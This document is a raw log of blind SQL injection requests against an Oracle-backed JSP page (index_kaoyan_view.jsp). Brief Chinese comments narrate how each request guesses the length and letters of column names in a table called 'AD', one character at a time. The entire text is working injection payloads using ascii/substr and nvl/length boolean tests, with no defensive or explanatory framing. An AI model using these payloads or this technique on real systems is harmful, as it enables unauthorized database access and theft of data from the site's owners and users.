http://www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 53=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 53>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 51>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 50=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 50>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 48=ascii(substr((SELECT COUNT(*) FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))


 以下為猜解第一列的第一個(gè)字段名CLASS的長度為:5

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 5<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 9>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 7=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 7>nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 5=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)


 以下為猜解第一列第一個(gè)字段的第一位為:C

http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 68>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 66=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 66>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))


 以下為猜解第一列第一個(gè)字段的第一位為:L

http://www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 73>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))


 以下為猜解第一列第一個(gè)字段的第三位為:A

http://www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 83>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))


http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 84>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 81=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 81>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 82>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))


 以下為猜解第二列:

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 5<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 9>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 7=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 74=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 74>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 72=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 72=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 81=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 81>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 76>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 74=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 74>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 82>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 86=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 86>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
